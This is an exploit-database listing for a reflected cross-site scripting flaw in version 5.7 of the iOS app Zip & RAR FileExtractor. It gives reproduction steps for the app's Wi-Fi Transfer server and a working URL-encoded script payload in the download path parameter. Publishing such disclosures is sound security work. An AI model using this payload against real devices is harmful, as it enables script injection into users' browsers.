Zip And RAR FileExtractor 5.7 Cross Site Scripting

2023.06.30
Credit: tmrswrr
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: Zip & RAR FileExtractor v5.7 - Reflected XSS # Vendor Homepage: Penghui Zhao # Software Link: https://apps.apple.com/tr/app/zip-rar-file-extractor/id769409043?l=en # Date: 2023-06-20 # Exploit Author: tmrswrr # Category : ios app # Version: v5.7 # Tested on: Windows/Linux ## Description: >> Go to Wi-Fi Transfer section in zip rar file extractor app >> It will be create link : 192.168.1.104:8080 >> When open link your browser , write payload, xss payload execute page and see alert button Url: http://192.168.1.104:8080/download?path=%22%3E%3Cscript%3Ealert(document.domain)%3C%2fscript%3E Payload: %22%3E%3Cscript%3Ealert(document.domain)%3C%2fscript%3E


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top